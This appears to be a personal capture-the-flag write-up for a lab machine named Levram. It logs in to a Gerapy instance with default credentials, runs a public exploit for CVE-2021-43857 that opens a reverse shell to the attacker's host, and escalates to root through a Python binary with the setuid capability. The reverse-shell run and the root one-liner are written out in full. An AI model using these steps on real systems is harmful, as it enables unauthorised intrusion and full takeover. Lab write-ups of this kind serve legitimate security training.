Levram - Writeup - Konstantinovitz

## Enumeration ## Initial Access Goto website at: 192.168.188.24:8080 Website is running: https://github.com/Gerapy/Gerapy Authenticate via: `admin:admin`. Searchsploit reveals an authenticated RCE [CVE-2021-43857](https://www.exploit-db.com/exploits/50640): >Gerapy is a distributed crawler management framework. Gerapy prior to version 0.9.8 is vulnerable to remote code execution, and this issue is patched in version 0.9.8. ![[Pasted image 20250331131718.png]] ```sh ╭─[λ]-[/targets/levram]-[192.168.188.24] ╰─> searchsploit -m 50640 ``` exploit matches target version: ![[Pasted image 20250331132358.png]] Seems we need to create a project for the exploit to work: ![[Pasted image 20250331133711.png]] Execute the payload: ```sh (exploit) ╭─[λ]-[/targets/levram/exploit]-[192.168.188.24] ╰─> python 50640.py -t 192.168.188.24 -p 8000 -L 192.168.45.231 -P 445 ______ _______ ____ ___ ____ _ _ _ _____ ___ ____ _____ / ___\ \ / / ____| |___ \ / _ \___ \/ | | || ||___ / ( _ ) ___|___ | | | \ \ / /| _| _____ __) | | | |__) | |_____| || |_ |_ \ / _ \___ \ / / | |___ \ V / | |__|_____/ __/| |_| / __/| |_____|__ _|__) | (_) |__) |/ / \____| \_/ |_____| |_____|\___/_____|_| |_||____/ \___/____//_/ Exploit for CVE-2021-43857 For: Gerapy < 0.9.8 [*] Resolving URL... [*] Logging in to application... [*] Login successful! Proceeding... [*] Getting the project list [*] Found project: hax [*] Getting the ID of the project to build the URL [*] Found ID of the project: 1 [*] Setting up a netcat listener listening on [any] 445 ... [*] Executing reverse shell payload [*] Watchout for shell! :) connect to [192.168.45.231] from (UNKNOWN) [192.168.188.24] 48604 bash: cannot set terminal process group (844): Inappropriate ioctl for device bash: no job control in this shell app@ubuntu:~/gerapy$ whoami whoami app ``` Aaaaand we're in. Took about 30 minutes. ## Privesc A quick shell improvement: ```sh python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm ``` Linpeas execution reveals a 95% percent privesc vector: ``` Files with capabilities (limited to 50): ... /usr/bin/python3.10 cap_setuid=ep ... ``` One may go read about this on [gtfobins - python](https://gtfobins.github.io/gtfobins/python/): >If the binary has the Linux `CAP_SETUID` capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID. Execute: ```sh /usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/sh")' # whoami root ``` Took about 10 minutes. ## Lessons Learned - Just drilling more shit - Read exploit code (was a little stuck on the project requirement thingy)